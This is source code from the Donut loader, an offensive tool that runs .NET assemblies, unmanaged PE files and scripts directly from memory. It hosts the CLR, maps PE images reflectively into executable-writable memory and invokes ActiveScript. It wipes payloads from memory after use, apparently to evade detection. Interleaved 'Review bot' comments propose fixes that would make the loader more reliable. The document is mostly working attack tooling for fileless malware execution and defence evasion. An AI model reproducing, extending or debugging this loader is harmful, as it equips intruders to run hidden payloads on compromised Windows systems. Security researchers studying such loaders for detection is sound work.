33 HRESULT hr = S_OK;
34 BSTR domain;
35 SAFEARRAYBOUND sab;
36 SAFEARRAY *sa;
37 DWORD i;
38 BOOL loaded=FALSE, loadable;
39 PBYTE p;
40
41 if(inst->type == DONUT_INSTANCE_PIC) {
42 DPRINT("Using module embedded in instance");
43 mod = (PDONUT_MODULE)&inst->module.x;
44 } else {
45 DPRINT("Loading module from allocated memory");
46 mod = inst->module.p;
47 }
48
49 if(inst->api.CLRCreateInstance != NULL) {
50 DPRINT("CLRCreateInstance");
51
52 hr = inst->api.CLRCreateInstance(
53 (REFCLSID)&inst->xCLSID_CLRMetaHost,
54 (REFIID)&inst->xIID_ICLRMetaHost,
55 (LPVOID*)&pa->icmh);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
59
60 hr = pa->icmh->lpVtbl->GetRuntime(
61 pa->icmh, mod->runtime,
62 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
63
64 if(SUCCEEDED(hr)) {
65 DPRINT("ICLRRuntimeInfo::IsLoadable");
66 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
67
68 if(SUCCEEDED(hr) && loadable) {
69 DPRINT("ICLRRuntimeInfo::GetInterface");
70
71 hr = pa->icri->lpVtbl->GetInterface(
72 pa->icri,
73 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
74 (REFIID)&inst->xIID_ICorRuntimeHost,
75 (LPVOID)&pa->icrh);
76
77 DPRINT("HRESULT: %08lx", hr);
78 }
79 } else pa->icri = NULL;
80 } else pa->icmh = NULL;
81 }
82 if(FAILED(hr)) {
83 DPRINT("CorBindToRuntime");
84
85 hr = inst->api.CorBindToRuntime(
86 NULL, // load whatever's available
87 NULL, // load workstation build
88 &inst->xCLSID_CorRuntimeHost,
89 &inst->xIID_ICorRuntimeHost,
90 (LPVOID*)&pa->icrh);
91
92 DPRINT("HRESULT: %08lx", hr);
93 }
94
95 if(FAILED(hr)) {
96 pa->icrh = NULL;
97 return FALSE;
98 }
99 DPRINT("ICorRuntimeHost::Start");
100
101 hr = pa->icrh->lpVtbl->Start(pa->icrh);
102
103 if(SUCCEEDED(hr)) {
104 domain = inst->api.SysAllocString(mod->domain);
105
106 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
107
108 hr = pa->icrh->lpVtbl->CreateDomain(
109 pa->icrh, domain, NULL, &pa->iu);
110
111 inst->api.SysFreeString(domain);
112
113 if(SUCCEEDED(hr)) {
114 DPRINT("IUnknown::QueryInterface");
115
116 hr = pa->iu->lpVtbl->QueryInterface(
117 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
118
119 if(SUCCEEDED(hr)) {
120 sab.lLbound = 0;
121 sab.cElements = mod->len;
122 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
123
124 if(sa != NULL) {
125 DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
126
127 for(i=0, p=sa->pvData; i<mod->len; i++) {
128 p[i] = mod->data[i];
129 }
130
131 DPRINT("AppDomain::Load_3");
132
133 hr = pa->ad->lpVtbl->Load_3(
134 pa->ad, sa, &pa->as);
135
136 loaded = hr == S_OK;
137
138 DPRINT("HRESULT : %08lx", hr);
139
140 DPRINT("Erasing assembly from memory");
141
142 for(i=0, p=sa->pvData; i<mod->len; i++) {
143 p[i] = mod->data[i] = 0;
144 }
145
146 DPRINT("SafeArrayDestroy");
147 inst->api.SafeArrayDestroy(sa);
148 }
149 }
150 }
151 }
152 return loaded;
153 }
154
155 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
156 SAFEARRAY *sav=NULL, *params=NULL;
157 VARIANT arg, ret, vtPsa, v1={0}, v2;
158 DWORD i;
159 PDONUT_MODULE mod;
160 HRESULT hr;
161 BSTR cls, method;
162 ULONG cnt;
163 OLECHAR str[1]={0};
164 LONG ucnt, lcnt;
165
166 if(inst->type == DONUT_INSTANCE_PIC) {
167 DPRINT("Using module embedded in instance");
168 mod = (PDONUT_MODULE)&inst->module.x;
169 } else {
170 DPRINT("Loading module from allocated memory");
171 mod = inst->module.p;
172 }
173
174 DPRINT("Type is %s",
175 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
176
177 // if this is a program
178 if(mod->type == DONUT_MODULE_NET_EXE) {
179 // get the entrypoint
180 DPRINT("MethodInfo::EntryPoint");
181 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
182
183 if(SUCCEEDED(hr)) {
184 // get the parameters for entrypoint
185 DPRINT("MethodInfo::GetParameters");
186 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
187
188 if(SUCCEEDED(hr)) {
189 DPRINT("SafeArrayGetLBound");
190 hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
191
192 DPRINT("SafeArrayGetUBound");
193 hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
194 cnt = ucnt - lcnt + 1;
195 DPRINT("Number of parameters for entrypoint : %i", cnt);
196
197 // does Main require string[] args?
198 if(cnt != 0) {
199 // create a 1 dimensional array for Main parameters
200 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
201 // if user specified their own parameters, add to string array
202 if(mod->param_cnt != 0) {
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
206
207 // add each string parameter
208 for(i=0; i<mod->param_cnt; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
210
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(mod->param[i]));
213 }
214 } else {
215 DPRINT("Adding empty string for invoke_3");
216 // add empty string to make it work
217 // create 1 dimensional array for strings[] args
218 vtPsa.vt = (VT_ARRAY | VT_BSTR);
219 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
220
221 i=0;
222 inst->api.SafeArrayPutElement(vtPsa.parray,
223 &i, inst->api.SysAllocString(str));
224 }
225 // add string array to list of parameters
226 i=0;
227 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
228 }
229 v1.vt = VT_NULL;
230 v1.plVal = NULL;
231
232 DPRINT("MethodInfo::Invoke_3()\n");
233
234 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
235
236 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
237 hr, SUCCEEDED(hr) ? "Success" : "Failed");
238
239 if(sav != NULL) {
240 inst->api.SafeArrayDestroy(vtPsa.parray);
241 inst->api.SafeArrayDestroy(sav);
242 }
243 }
244 } else pa->mi = NULL;
245 } else {
246 DPRINT("SysAllocString(\"%ws\")", mod->cls);
247 cls = inst->api.SysAllocString(mod->cls);
248 if(cls == NULL) return FALSE;
249
250 DPRINT("SysAllocString(\"%ws\")", mod->method);
251 method = inst->api.SysAllocString(mod->method);
252
253 if(method != NULL) {
254 DPRINT("Assembly::GetType_2");
255 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
256
257 if(SUCCEEDED(hr)) {
258 sav = NULL;
259 if(mod->param_cnt != 0) {
260 DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
261
262 sav = inst->api.SafeArrayCreateVector(
263 VT_VARIANT, 0, mod->param_cnt);
264
265 if(sav != NULL) {
266 for(i=0; i<mod->param_cnt; i++) {
267 DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
268
269 V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
270 V_VT(&arg) = VT_BSTR;
271
272 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
273
274 if(FAILED(hr)) {
275 DPRINT("SafeArrayPutElement failed.");
276 inst->api.SafeArrayDestroy(sav);
277 sav = NULL;
278 }
279 }
280 }
281 }
282 if(SUCCEEDED(hr)) {
283 DPRINT("Calling Type::InvokeMember_3");
284
285 hr = pa->type->lpVtbl->InvokeMember_3(
286 pa->type,
287 method, // name of method
288 BindingFlags_InvokeMethod |
289 BindingFlags_Static |
290 BindingFlags_Public,
291 NULL,
292 v1, // empty VARIANT
293 sav, // arguments to method
294 &ret); // return code from method
295
296 DPRINT("Type::InvokeMember_3 : %08lx : %s",
297 hr, SUCCEEDED(hr) ? "Success" : "Failed");
298
299 if(sav != NULL) {
300 inst->api.SafeArrayDestroy(sav);
301 }
302 }
303 }
304 inst->api.SysFreeString(method);
305 }
306 inst->api.SysFreeString(cls);
307 }
308 return TRUE;
309 }
310
311 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
312
313 if(pa->type != NULL) {
314 DPRINT("Type::Release");
315 pa->type->lpVtbl->Release(pa->type);
316 pa->type = NULL;
317 }
318
319 if(pa->mi != NULL) {
320 DPRINT("MethodInfo::Release");
321 pa->mi->lpVtbl->Release(pa->mi);
322 pa->mi = NULL;
323 }
324
325 if(pa->as != NULL) {
326 DPRINT("Assembly::Release");
327 pa->as->lpVtbl->Release(pa->as);
328 pa->as = NULL;
329 }
330
331 if(pa->ad != NULL) {
332 DPRINT("AppDomain::Release");
333 pa->ad->lpVtbl->Release(pa->ad);
334 pa->ad = NULL;
335 }
336
337 if(pa->iu != NULL) {
338 DPRINT("IUnknown::Release");
339 pa->iu->lpVtbl->Release(pa->iu);
340 pa->iu = NULL;
341 }
342
343 if(pa->icrh != NULL) {
344 DPRINT("ICorRuntimeHost::Stop");
345 pa->icrh->lpVtbl->Stop(pa->icrh);
346
347 DPRINT("ICorRuntimeHost::Release");
348 pa->icrh->lpVtbl->Release(pa->icrh);
349 pa->icrh = NULL;
350 }
351
352 if(pa->icri != NULL) {
353 DPRINT("ICLRRuntimeInfo::Release");
354 pa->icri->lpVtbl->Release(pa->icri);
355 pa->icri = NULL;
356 }
357
358 if(pa->icmh != NULL) {
359 DPRINT("ICLRMetaHost::Release");
360 pa->icmh->lpVtbl->Release(pa->icmh);
361 pa->icmh = NULL;
362 }
363 }
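Review bot: LoadAssembly dereferences an unset pa->icrh when ICLRRuntimeInfo::IsLoadable succeeds but reports the runtime as not loadable: the branch on line 68 skips GetInterface, hr is still S_OK, so the CorBindToRuntime fallback on line 82 and the FAILED check on line 95 are both skipped and line 101 calls Start through whatever pa->icrh held (NULL at best, and only if the caller zeroes pa, which is not visible here). A one-line guard fixes it — after the `if(SUCCEEDED(hr) && loadable) { … }` block add `else if(SUCCEEDED(hr)) hr = E_FAIL; // not loadable: fall through to CorBindToRuntime`. RunAssembly has a related reporting gap: it returns TRUE on every path except a failed SysAllocString (line 248), so a failing GetType_2, Invoke_3 or InvokeMember_3 is indistinguishable from success; track `ran = SUCCEEDED(hr);` after each invoke and `return ran;`. Also, SafeArrayPutElement copies a BSTR or VARIANT element, so each `SysAllocString` result passed on lines 212, 223 and 269 should be released with SysFreeString (or VariantClear for `arg`) afterwards, and the `params` array from GetParameters and the `v2`/`ret` VARIANTs are never cleared.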
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(VOID);
44
45 typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
46
47 // same as strcmp
48 int xstrcmp(char *s1, char *s2) {
49 while(*s1 && (*s1==*s2))s1++,s2++;
50 return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
51 }
52
53 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
54 VOID RunPE(PDONUT_INSTANCE inst) {
55 PIMAGE_DOS_HEADER dos, doshost;
56 PIMAGE_NT_HEADERS nt, nthost;
57 PIMAGE_SECTION_HEADER sh;
58 PIMAGE_THUNK_DATA oft, ft;
59 PIMAGE_IMPORT_BY_NAME ibn;
60 PIMAGE_IMPORT_DESCRIPTOR imp;
61 PIMAGE_EXPORT_DIRECTORY exp;
62 PIMAGE_RELOC list;
63 PIMAGE_BASE_RELOCATION ibr;
64 DWORD rva;
65 PDWORD adr;
66 PDWORD sym;
67 PWORD ord;
68 PBYTE ofs;
69 PCHAR str, name;
70 HMODULE dll;
71 ULONG_PTR ptr;
72 DllMain_t DllMain; // DLL
73 Start_t Start; // EXE
74 call_stub_t CallApi; // DLL function
75 LPVOID cs = NULL, base, host;
76 DWORD i, cnt;
77 PDONUT_MODULE mod;
78 FARPROC api=NULL; // DLL export
79
80 // write shellcode to stack. msvc sux!!
81 #include "call_api_bin.h"
82
83 if(inst->type == DONUT_INSTANCE_PIC) {
84 DPRINT("Using module embedded in instance");
85 mod = (PDONUT_MODULE)&inst->module.x;
86 } else {
87 DPRINT("Loading module from allocated memory");
88 mod = inst->module.p;
89 }
90
91 base = mod->data;
92 dos = (PIMAGE_DOS_HEADER)base;
93 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
94
95 // before doing anything. check compatibility between exe/dll and host process.
96 host = inst->api.GetModuleHandle(NULL);
97 doshost = (PIMAGE_DOS_HEADER)host;
98 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
99
100 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
101 DPRINT("Host process and payload are not compatiable...cannot load.");
102 return;
103 }
104
105 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
106 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
107
108 cs = inst->api.VirtualAlloc(
109 NULL, nt->OptionalHeader.SizeOfImage + 4096,
110 MEM_COMMIT | MEM_RESERVE,
111 PAGE_EXECUTE_READWRITE);
112
113 if(cs == NULL) return;
114
115 DPRINT("Copying each section to RWX memory %p", cs);
116 sh = IMAGE_FIRST_SECTION(nt);
117
118 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
119 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
120 (PBYTE)base + sh[i].PointerToRawData,
121 sh[i].SizeOfRawData);
122 }
123
124 DPRINT("Processing the Import Table");
125 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
126 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
127
128 // For each DLL
129 for (;imp->Name!=0; imp++) {
130 name = RVA2VA(PCHAR, cs, imp->Name);
131
132 DPRINT("Loading %s", name);
133 dll = inst->api.LoadLibraryA(name);
134
135 // Resolve the API for this library
136 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
137 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
138
139 // For each API
140 for (;; oft++, ft++) {
141 // No API left?
142 if (oft->u1.AddressOfData == 0) break;
143
144 PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
145
146 // Resolve by ordinal?
147 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
148 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
149 } else {
150 // Resolve by name
151 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
152 *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
153 }
154 }
155 }
156
157 DPRINT("Applying Relocations");
158 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
159 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
160 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
161
162 while(ibr->VirtualAddress != 0) {
163 list = (PIMAGE_RELOC)(ibr + 1);
164
165 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
166 if(list->type == IMAGE_REL_TYPE) {
167 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
168 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
169 DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
170 goto pe_cleanup;
171 }
172 list++;
173 }
174 ibr = (PIMAGE_BASE_RELOCATION)list;
175 }
176
177 if(mod->type == DONUT_MODULE_DLL) {
178 // call exported api?
179 if(mod->method[0] != 0) {
180 DPRINT("Resolving address of %s", (char*)mod->method);
181
182 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
183
184 if(rva != 0) {
185 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
186 cnt = exp->NumberOfNames;
187
188 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
189
190 if(cnt != 0) {
191 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
192 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
193 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
194
195 do {
196 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
197 if(!xstrcmp(str, (char*)mod->method)) {
198 api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
199 break;
200 }
201 } while (--cnt);
202
203 if(api != NULL) {
204 CallApi = inst->api.VirtualAlloc(
205 NULL,
206 sizeof(CALL_API_BIN),
207 MEM_COMMIT | MEM_RESERVE,
208 PAGE_EXECUTE_READWRITE);
209
210 if(CallApi != NULL) {
211 DPRINT("Calling %s via code stub.", (char*)mod->method);
212 Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
213 CallApi(api, mod->param_cnt, mod->param);
214 DPRINT("Erasing code stub");
215 Memset(CallApi, 0, sizeof(CALL_API_BIN));
216 inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
217 }
218 } else {
219 DPRINT("Unable to resolve API");
220 goto pe_cleanup;
221 }
222 }
223 }
224 } else {
225 DPRINT("Executing entrypoint of DLL\n\n");
226 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
227 DllMain(host, DLL_PROCESS_ATTACH, NULL);
228 }
229 } else {
230 // The problem with executing EXE files:
231 // 1) They use subsystems either GUI or CUI
232 // 2) They call ExitProcess ...will need to review support of this later.
233 DPRINT("Executing entrypoint of EXE\n\n");
234 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
235 Start();
236 }
237 pe_cleanup:
238 // if memory allocated
239 if(cs != NULL) {
240 // DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
241 // nt->OptionalHeader.SizeOfImage, cs);
242 // erase from memory (disabled for now)
243 // Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
244 // release
245 DPRINT("Releasing memory");
246 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
247 }
248 }
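Review bot: the import loop in RunPE never checks the LoadLibraryA result on line 133, so a DLL the payload needs but the host cannot load leaves GetProcAddress(NULL, …) writing zeros into the IAT and the failure surfaces later as a crash inside the payload instead of a clean exit; add `if(dll == NULL) { DPRINT("Unable to load %s", name); goto pe_cleanup; }` right after the call. The whole image is mapped PAGE_EXECUTE_READWRITE (line 111) and left that way; allocating RW, copying, and then VirtualProtect-ing each section according to its Characteristics would avoid a writable-and-executable region. No IMAGE_DIRECTORY_ENTRY_TLS handling is visible, so payloads relying on TLS callbacks will not have them run — worth stating in the header comment on line 53. Note also that the DLL entry point is invoked with `host` as hinstDLL (line 227) rather than the mapped base `cs`, and the image is released at pe_cleanup as soon as DllMain returns, so a thread the payload started in DllMain would keep executing from freed memory; if that is an intended limitation, say so in a comment.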
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IHostVtbl wscript_vtbl;
38 PDONUT_MODULE mod;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43
44 if(inst->type == DONUT_INSTANCE_PIC) {
45 DPRINT("Using module embedded in instance");
46 mod = (PDONUT_MODULE)&inst->module.x;
47 } else {
48 DPRINT("Loading module from allocated memory");
49 mod = inst->module.p;
50 }
51
52 // 1. Allocate memory for unicode format of script
53 script = (PWCHAR)inst->api.VirtualAlloc(
54 NULL,
55 (inst->mod_len + 1) * sizeof(WCHAR),
56 MEM_COMMIT | MEM_RESERVE,
57 PAGE_READWRITE);
58
59 // 2. Convert string to unicode.
60 if(script != NULL) {
61 // 2. Convert string to unicode.
62 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
63 -1, script, mod->len * sizeof(WCHAR));
64
65 // we're using stack memory for the virtual function table
66 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
67 ActiveScript_New(inst, &mas.site);
68
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 mas.siteWnd.lpVtbl = NULL;
73
74 // 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
75 DPRINT("CoInitializeEx");
76 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
77
78 if(hr == S_OK) {
79 // 5. Instantiate the active script engine
80 DPRINT("CoCreateInstance(IID_IActiveScript)");
81
82 hr = inst->api.CoCreateInstance(
83 &inst->xCLSID_ScriptLanguage, 0,
84 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
85 &inst->xIID_IActiveScript, (void **)&engine);
86
87 if(hr == S_OK) {
88 // 6. Get IActiveScriptParse object from engine
89 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
90
91 hr = engine->lpVtbl->QueryInterface(
92 engine,
93 #ifdef _WIN64
94 &inst->xIID_IActiveScriptParse64,
95 #else
96 &inst->xIID_IActiveScriptParse32,
97 #endif
98 (void **)&parser);
99
100 if(hr == S_OK) {
101 // 7. Initialize parser
102 DPRINT("IActiveScriptParse::InitNew");
103 hr = parser->lpVtbl->InitNew(parser);
104
105 if(hr == S_OK) {
106 // 8. Set custom script interface
107 DPRINT("IActiveScript::SetScriptSite");
108 mas.wscript.lpEngine = engine;
109
110 hr = engine->lpVtbl->SetScriptSite(
111 engine, (IActiveScriptSite *)&mas);
112
113 if(hr == S_OK) {
114 DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
115 obj = inst->api.SysAllocString(inst->wscript);
116 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
117 inst->api.SysFreeString(obj);
118
119 if(hr == S_OK) {
120 // 9. Load script
121 DPRINT("IActiveScriptParse::ParseScriptText");
122 hr = parser->lpVtbl->ParseScriptText(
123 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
124
125 if(hr == S_OK) {
126 // 10. Run script
127 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
128 hr = engine->lpVtbl->SetScriptState(
129 engine, SCRIPTSTATE_CONNECTED);
130
131 // SetScriptState blocks here
132 }
133 }
134 }
135 }
136 DPRINT("IActiveScriptParse::Release");
137 parser->lpVtbl->Release(parser);
138 }
139 DPRINT("IActiveScript::Close");
140 engine->lpVtbl->Close(engine);
141
142 DPRINT("IActiveScript::Release");
143 engine->lpVtbl->Release(engine);
144 }
145 }
146 DPRINT("Erasing script from memory");
147 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
148
149 DPRINT("VirtualFree(script)");
150 inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
151 }
152 }
153
154 #include "activescript.c"
155 #include "wscript.c"
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunXSL(PDONUT_INSTANCE inst) {
32 IXMLDOMDocument *pDoc;
33 IXMLDOMNode *pNode;
34 HRESULT hr;
35 PWCHAR xsl_str;
36 VARIANT_BOOL loaded;
37 BSTR res;
38 PDONUT_MODULE mod;
39 ULONG64 len;
40 UCHAR c;
41
42 if(inst->type == DONUT_INSTANCE_PIC) {
43 DPRINT("Using module embedded in instance");
44 mod = (PDONUT_MODULE)&inst->module.x;
45 } else {
46 DPRINT("Loading module from allocated memory");
47 mod = inst->module.p;
48 }
49
50 // 1. Allocate RW memory for unicode format of script
